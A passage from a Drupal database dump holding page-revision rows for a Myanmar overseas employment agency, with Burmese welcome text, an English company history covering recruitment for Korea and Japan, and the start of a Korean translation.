ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။&nbsp;</p>', '', 'full_html'),
('page', 0, 1, 27, 'en', 0, '<h3>ကြယ်တံခွန်သစ် ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးမှ ကြိုဆိုပါသည်။</h3><img src=\"/sites/default/files/inline-images/new_comet_trading_agency_0.jpg\" data-align=\"center\" data-entity-uuid=\"42e9d2a3-e284-49bb-81cb-2510b37a5871\" data-entity-type=\"file\"><p><br>ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။&nbsp;</p><p>ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။&nbsp;</p><p>ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။&nbsp;</p>', '', 'full_html'),
('page', 0, 1, 47, 'en', 0, '<h3>ကြယ်တံခွန်သစ် ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးမှ ကြိုဆိုပါသည်။</h3><img src=\"/sites/default/files/inline-images/new_comet_trading_agency_0.jpg\" data-align=\"center\" data-entity-uuid=\"42e9d2a3-e284-49bb-81cb-2510b37a5871\" data-entity-type=\"file\"><p><br>ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။&nbsp;</p><p>ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။&nbsp;</p><p>ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။&nbsp;</p><p>example sample 001</p>', '', 'full_html'),
('page', 0, 1, 48, 'en', 0, '<h3>ကြယ်တံခွန်သစ် ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးမှ ကြိုဆိုပါသည်။</h3><img src=\"/sites/default/files/inline-images/new_comet_trading_agency_0.jpg\" data-align=\"center\" data-entity-uuid=\"42e9d2a3-e284-49bb-81cb-2510b37a5871\" data-entity-type=\"file\"><p><br>ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။&nbsp;</p><p>ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။&nbsp;</p><p>ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။&nbsp;</p>', '', 'full_html'),
('page', 0, 1, 54, 'en', 0, '<h3>ကြယ်တံခွန်သစ် ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးမှ ကြိုဆိုပါသည်။</h3><img src=\"/sites/default/files/inline-images/new_comet_trading_agency_0.jpg\" data-align=\"center\" data-entity-uuid=\"42e9d2a3-e284-49bb-81cb-2510b37a5871\" data-entity-type=\"file\"><p><br>ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။&nbsp;</p><p>ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။&nbsp;</p><p>ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။&nbsp;</p>', '', 'full_html'),
('page', 0, 1, 64, 'en', 0, '<h3>ကြယ်တံခွန်သစ် ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးမှ ကြိုဆိုပါသည်။</h3><img src=\"/sites/default/files/inline-images/new_comet_trading_agency_0.jpg\" data-align=\"center\" data-entity-uuid=\"42e9d2a3-e284-49bb-81cb-2510b37a5871\" data-entity-type=\"file\"><p><br>ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။</p><p>&nbsp;</p><p>&nbsp;</p>', '', 'full_html'),
('page', 0, 1, 67, 'en', 0, '<h3>Welcome to Our Website \"NEW COMET TRADING AGENCY\"!!!!</h3><img src=\"/sites/default/files/inline-images/new_comet_trading_agency_0.jpg\" data-align=\"center\" data-entity-uuid=\"42e9d2a3-e284-49bb-81cb-2510b37a5871\" data-entity-type=\"file\"><p><span style=\"font-size:14.0pt;line-height:107%;\">We, ``NEW COMET TRADING\'\' company, was established in 2004 and started operating with company registration number (295/2004-2005).</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">NEW COMET TRADING AGENCY Co.,Ltd (New Comet Overseas Employment Agency) license was obtained in 2023 and since then, the company has started to carry out service activities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">&nbsp;We, ``NEW COMET TRADING AGENCY\'\' company, which is a brother company, such as, ZEYA NEW COMET Auto Sale &amp; Services Co.,Ltd, NEW COMET Co.,Ltd, have applied for vehicle import permits from the Ministry of Economy and Commerce, and have been working for more than 25 years in the business of buying, importing and selling various types of business trucks, tourism and transportation buses and machinery directly from Japan, and have paid the taxes set for the state. More than 100 employees were given employment opportunities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, brother companies such as NEW COMET Construction Co.,Ltd, NEW ZAYYA SHWE PYI Construction Co.,Ltd, AUNG NAY WUN Construction Co.,Ltd and other companies have also successfully won tenders from government ministries and have provided employment opportunities to more than 200 employees.</span></p><p><span style=\"font-size:14.0pt;line-height:107%;\">Our company \"NEW COMET TRADING AGENCY “company is currently providing welding training courses to become qualified skilled workers at the Sinmalike Shipyard under the Ministry of Transport and Communications for ethnic brothers from all over Myanmar who want to work in Korea\'s shipyards and connect them with job opportunities.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, we are connecting job opportunities for young people who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, and Japan.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We at NEW COMET TRADING AGENCY Co.Ltd, are assisting on responsible for learning about Japan\'s developed advanced technologies, cultures and expressing their personal abilities and goals for the young generation in Myanmar.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In order to successfully pass the qualification tests (JLPT, JFT, NAT-TEST, TOP-J) required to go to Japan with a Work Visa and Training Visa, we are opening language training schools and providing teaching support.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We, \"NEW COMET TRADING AGENCY\" company, is constantly striving to provide services that produce talented skilled workers from Myanmar and send them to foreign countries.</span><o:p></o:p></p><p>&nbsp;</p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 1, 68, 'en', 0, '<h3>Welcome to Our Website \"NEW COMET TRADING AGENCY\"!!!!</h3><img src=\"/sites/default/files/inline-images/new_comet_trading_agency_0.jpg\" data-align=\"center\" data-entity-uuid=\"42e9d2a3-e284-49bb-81cb-2510b37a5871\" data-entity-type=\"file\"><p><span style=\"font-size:14.0pt;line-height:107%;\">We, ``NEW COMET TRADING\'\' company, was established in 2004 and started operating with company registration number (295/2004-2005).</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">NEW COMET TRADING AGENCY Co.,Ltd (New Comet Overseas Employment Agency) license was obtained in 2023 and since then, the company has started to carry out service activities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">&nbsp;We, ``NEW COMET TRADING AGENCY\'\' company, which is a brother company, such as, ZEYA NEW COMET Auto Sale &amp; Services Co.,Ltd, NEW COMET Co.,Ltd, have applied for vehicle import permits from the Ministry of Economy and Commerce, and have been working for more than 25 years in the business of buying, importing and selling various types of business trucks, tourism and transportation buses and machinery directly from Japan, and have paid the taxes set for the state. More than 100 employees were given employment opportunities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, brother companies such as NEW COMET Construction Co.,Ltd, NEW ZAYYA SHWE PYI Construction Co.,Ltd, AUNG NAY WUN Construction Co.,Ltd and other companies have also successfully won tenders from government ministries and have provided employment opportunities to more than 200 employees.</span></p><p><span style=\"font-size:14.0pt;line-height:107%;\">Our company \"NEW COMET TRADING AGENCY “company is currently providing welding training courses to become qualified skilled workers at the Sinmalike Shipyard under the Ministry of Transport and Communications for ethnic brothers from all over Myanmar who want to work in Korea\'s shipyards and connect them with job opportunities.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, we are connecting job opportunities for young people who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, and Japan.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We at NEW COMET TRADING AGENCY Co.Ltd, are assisting on responsible for learning about Japan\'s developed advanced technologies, cultures and expressing their personal abilities and goals for the young generation in Myanmar.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In order to successfully pass the qualification tests (JLPT, JFT, NAT-TEST, TOP-J) required to go to Japan with a Work Visa and Training Visa, we are opening language training schools and providing teaching support.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We, \"NEW COMET TRADING AGENCY\" company, is constantly striving to provide services that produce talented skilled workers from Myanmar and send them to foreign countries.</span></p><p>&nbsp;</p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> ``New Comet Trading\'\'&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 2004</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">설립되어</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사업자등록번호</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">(295/2004-2005)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">로</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">영업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">시작하였습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">뉴코멧무역대행</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 2023</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">뉴코멧</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">외국인고용업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">면허를</span><span 